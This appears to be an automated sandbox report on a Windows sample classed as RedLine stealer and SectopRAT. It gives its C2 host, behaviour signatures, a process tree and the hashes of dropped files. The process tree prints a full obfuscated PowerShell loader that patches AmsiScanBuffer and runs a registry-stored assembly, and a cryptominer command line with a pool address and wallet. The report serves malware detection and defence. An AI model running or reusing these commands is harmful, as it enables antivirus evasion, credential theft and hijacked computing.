Analysis

  • max time kernel
    150s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 02:23

General

  • Target

    234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe

  • Size

    1.1MB

  • MD5

    142727883c537e287bae329e5a2e0ce8

  • SHA1

    981eaaaba35b326a5dbe386cc5a02adeb52447e7

  • SHA256

    234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7

  • SHA512

    e557519293c0518f5df61d77b42a1f2b4ee58c1bb33ae3db5b7c2da4754bf54f652e51f2e437b138fb62e6750b6caa2c882332ef9b86713f9c8a62566a821212

  • SSDEEP

    24576:1MOjO8wmd7hUjBGna1qIWFLISsSaYEbJgEK8LFYUs:1MOjO857CjJuLI1lyEfx

Malware Config

Extracted

Family

redline

Botnet

iShop

C2

venom.underground-cheat.com:1337

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sectoprat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Downloads MZ/PE file
  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:620
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:420
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{55cb6f04-d76f-4051-8537-237986b47afc}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4304
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:676
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:960
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:716
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:1012
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1076
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1088
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                    PID:1168
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1176
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2808
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EGoZXpHoPiRz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oxixgBHPNRDGub,[Parameter(Position=1)][Type]$ChbdZsTOny)$hRcIchewjlk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+'l'+''+'e'+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+'m'+'o'+[Char](114)+''+'y'+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e',$False).DefineType('MyDe'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+'yp'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+'o'+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$hRcIchewjlk.DefineConstructor('R'+'T'+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+''+'a'+'lN'+'a'+'m'+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+[Char](44)+'Pu'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$oxixgBHPNRDGub).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$hRcIchewjlk.DefineMethod(''+[Char](73)+''+'n'+'vo'+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+'g'+','+''+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+'o'+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tu'+[Char](97)+'l',$ChbdZsTOny,$oxixgBHPNRDGub).SetImplementationFlags('Ru'+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $hRcIchewjlk.CreateType();}$ThfTOaNdKmldq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'ste'+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+'i'+''+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+'t'+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+'s');$uDPJlTwBoLONiv=$ThfTOaNdKmldq.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+'Ad'+[Char](100)+''+'r'+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+'c,Sta'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jnHyWhNeRcLfahgOKOH=EGoZXpHoPiRz @([String])([IntPtr]);$lNrHlxzgikecVntezFnncw=EGoZXpHoPiRz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$vOKrEsVKSBa=$ThfTOaNdKmldq.GetMethod(''+[Char](71)+'e'+'t'+''+'M'+'odu'+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+'3'+'2.'+'d'+''+'l'+''+[Char](108)+'')));$iqeJCEwwseOcEf=$uDPJlTwBoLONiv.Invoke($Null,@([Object]$vOKrEsVKSBa,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+'ibr'+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$tIsuIccJTOwfiSCdv=$uDPJlTwBoLONiv.Invoke($Null,@([Object]$vOKrEsVKSBa,[Object]('V'+'i'+'r'+[Char](116)+''+'u'+''+'a'+''+'l'+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$ARfLaNQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iqeJCEwwseOcEf,$jnHyWhNeRcLfahgOKOH).Invoke(''+[Char](97)+'m'+'s'+'i'+[Char](46)+'d'+[Char](108)+''+'l'+'');$QSTbAGZsKSZltMpwu=$uDPJlTwBoLONiv.Invoke($Null,@([Object]$ARfLaNQ,[Object](''+[Char](65)+'m'+'s'+''+'i'+'Sc'+[Char](97)+'n'+[Char](66)+''+'u'+''+'f'+'f'+'e'+''+[Char](114)+'')));$sTJTJxoNrX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tIsuIccJTOwfiSCdv,$lNrHlxzgikecVntezFnncw).Invoke($QSTbAGZsKSZltMpwu,[uint32]8,4,[ref]$sTJTJxoNrX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QSTbAGZsKSZltMpwu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tIsuIccJTOwfiSCdv,$lNrHlxzgikecVntezFnncw).Invoke($QSTbAGZsKSZltMpwu,[uint32]8,0x20,[ref]$sTJTJxoNrX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3924
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1264
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1320
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            1⤵
                              PID:1424
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1444
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1452
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1476
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1500
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2596
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1632
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1696
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1716
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1824
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1836
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1996
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:2004
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1768
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1944
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2112
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2180
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2240
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2312
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2568
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2576
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2644
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                        PID:2748
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                        1⤵
                                                                          PID:2784
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2816
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2828
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2868
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                1⤵
                                                                                  PID:2876
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3220
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3356
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3520
                                                                                      • C:\Users\Admin\AppData\Local\Temp\234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe"
                                                                                        2⤵
                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1736
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                        2⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4156
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          3⤵
                                                                                            PID:4348
                                                                                          • C:\Users\Admin\AppData\Local\Temp\eimdbt.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\eimdbt.exe"
                                                                                            3⤵
                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                            • Drops startup file
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1288
                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                              4⤵
                                                                                                PID:316
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                    PID:2288
                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                    C:\Windows\system32\WerFault.exe -u -p 316 -s 152
                                                                                                    5⤵
                                                                                                    • Checks processor information in registry
                                                                                                    • Enumerates system info in registry
                                                                                                    PID:3928
                                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4580
                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                              2⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:4032
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50
                                                                                                3⤵
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:3060
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                            1⤵
                                                                                              PID:3648
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:3824
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:3992
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:3576
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:396
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                        PID:4896
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                        1⤵
                                                                                                          PID:1524
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                          1⤵
                                                                                                            PID:2352
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                            1⤵
                                                                                                              PID:3328
                                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:3980
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                1⤵
                                                                                                                  PID:3320
                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                  1⤵
                                                                                                                    PID:4268
                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                    1⤵
                                                                                                                      PID:4812
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                      1⤵
                                                                                                                        PID:2472
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                        1⤵
                                                                                                                          PID:3200
                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          1⤵
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          • Checks processor information in registry
                                                                                                                          PID:1124
                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          1⤵
                                                                                                                            PID:3728
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                            1⤵
                                                                                                                              PID:3144
                                                                                                                            • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                              C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:1796
                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                PID:3212

                                                                                                                              Network

                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\ProgramData\Microsoft\Windows\WER\Temp\WER63E0.tmp.csv

                                                                                                                                Filesize

                                                                                                                                39KB

                                                                                                                                MD5

                                                                                                                                72356f696f73602433ea912a4c68d6a1

                                                                                                                                SHA1

                                                                                                                                7656f74f813a98df5c3e763876a346e8f54efe67

                                                                                                                                SHA256

                                                                                                                                edb7b4893d59fc808a81b0cec7bc2ea5f1601a9bc6d4538406c824c05c1defeb

                                                                                                                                SHA512

                                                                                                                                c7e0be345c6ba9e652a162c837cb734bce44ddc6b0a89c991442aee0917d58241cac4c7815f9febb4e25cb373af8b15c67552f523f12acf0fca0ab8ab19191de

                                                                                                                              • C:\ProgramData\Microsoft\Windows\WER\Temp\WER65A7.tmp.txt

                                                                                                                                Filesize

                                                                                                                                13KB

                                                                                                                                MD5

                                                                                                                                c84aaab375d09e0e87e6e8f0225a97d0

                                                                                                                                SHA1

                                                                                                                                1353a620b7f6c2f865a32bd5725287e168aebc32

                                                                                                                                SHA256

                                                                                                                                cb39be936f1ebc535fb73f7b73a5f037f4fd69a08aa26c2afa57f98b716dfcf1

                                                                                                                                SHA512

                                                                                                                                4942d0341734bed54881e074a9375481a52e6157a64e0bf33521e241e21d1bdda294789f938b5203e5028095755a4df6561af2be7202dce91ad1b9f31d91ffb5

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\eimdbt.exe

                                                                                                                                Filesize

                                                                                                                                2.1MB

                                                                                                                                MD5

                                                                                                                                169a647d79cf1b25db151feb8d470fc7

                                                                                                                                SHA1

                                                                                                                                86ee9ba772982c039b070862d6583bcfed764b2c

                                                                                                                                SHA256

                                                                                                                                e61431610df015f48ebc4f4bc0492c4012b34d63b2f474badf6085c9dbc7f708

                                                                                                                                SHA512

                                                                                                                                efb5fd3e37da05611be570fb87929af73e7f16639b5eb23140381434dc974afc6a69f338c75ede069b387015e302c5106bf3a8f2727bb0406e7ca1de3d48a925

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost.exe

                                                                                                                                Filesize

                                                                                                                                162KB

                                                                                                                                MD5

                                                                                                                                152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                                SHA1

                                                                                                                                c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                                SHA256

                                                                                                                                a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                                SHA512

                                                                                                                                2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp232C.tmp

                                                                                                                                Filesize

                                                                                                                                40KB

                                                                                                                                MD5

                                                                                                                                a182561a527f929489bf4b8f74f65cd7

                                                                                                                                SHA1

                                                                                                                                8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                                                SHA256

                                                                                                                                42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                                                SHA512

                                                                                                                                9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp2351.tmp

                                                                                                                                Filesize

                                                                                                                                114KB

                                                                                                                                MD5

                                                                                                                                eb8c6139f83c330881b13ec4460d5a39

                                                                                                                                SHA1

                                                                                                                                837283823a7e4e107ca7e39b1e7c3801841b1ef8

                                                                                                                                SHA256

                                                                                                                                489d5195735786050c4115677c5856e3ce72c3ecf2574be55021ad3d71caf40e

                                                                                                                                SHA512

                                                                                                                                88411dca362f0d9da0c093e60bf2b083340d0682b5ac91f25c78ac419cec1e325d0a5a0f96fd447d3d3806813cad7f1ca8cf9c423061327fbd16c8662f3cbddf

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp237D.tmp

                                                                                                                                Filesize

                                                                                                                                48KB

                                                                                                                                MD5

                                                                                                                                349e6eb110e34a08924d92f6b334801d

                                                                                                                                SHA1

                                                                                                                                bdfb289daff51890cc71697b6322aa4b35ec9169

                                                                                                                                SHA256

                                                                                                                                c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

                                                                                                                                SHA512

                                                                                                                                2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp2392.tmp

                                                                                                                                Filesize

                                                                                                                                20KB

                                                                                                                                MD5

                                                                                                                                49693267e0adbcd119f9f5e02adf3a80

                                                                                                                                SHA1

                                                                                                                                3ba3d7f89b8ad195ca82c92737e960e1f2b349df

                                                                                                                                SHA256

                                                                                                                                d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

                                                                                                                                SHA512

                                                                                                                                b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp2398.tmp

                                                                                                                                Filesize

                                                                                                                                116KB

